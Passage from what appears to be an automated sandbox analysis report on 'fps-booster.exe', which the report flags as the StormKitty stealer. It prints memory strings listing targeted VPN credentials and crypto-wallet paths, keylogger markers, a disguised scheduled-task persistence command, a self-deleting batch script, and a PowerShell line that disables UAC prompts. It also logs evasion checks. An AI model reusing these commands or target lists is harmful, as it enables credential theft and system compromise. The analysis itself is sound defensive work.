-LLOCKDUCKLOGS:HHD+3R+EVRAZHE54/W2WNESO8DTUKSJ1YMWK2BRJOL3UO9MAJTJHPY2CK1SQ4IZ8USER32.DLL,LOCKWORKSTATIONHIBERNATEBOMBNOTEPADEXPLORERMSPAINTCMDBSODINPUTDUCKLOGS:3KHDHYCPYZUYANOETO6PTQ9PPIB1EP/0UX3CGV+HJ+K=DUCKLOGS:T6NZTX1JOJD+4QKD1JHVEA==DUCKLOGS
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 12D0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 6310000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 6440000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 8380000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 9380000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: A380000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: B380000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 5310000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 6440000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: 9110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: A110000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: B810000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: C810000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: D810000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: E810000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeWindow / User API: threadDelayed 771Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2476Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 741Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6708Thread sleep count: 52 > 30Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6708Thread sleep time: -52000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6968Thread sleep count: 771 > 30Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6968Thread sleep count: 123 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: Amcache.hve.6.drBinary or memory string: VMware
        Source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.drBinary or memory string: vmci.sys
        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.drBinary or memory string: VMware20,1
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\fps-booster.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0Jump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeQueries volume information: C:\Users\user\Desktop\fps-booster.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\fps-booster.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        barindex
        Yara detected StormKitty Stealer
        Source: Yara matchFile source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown 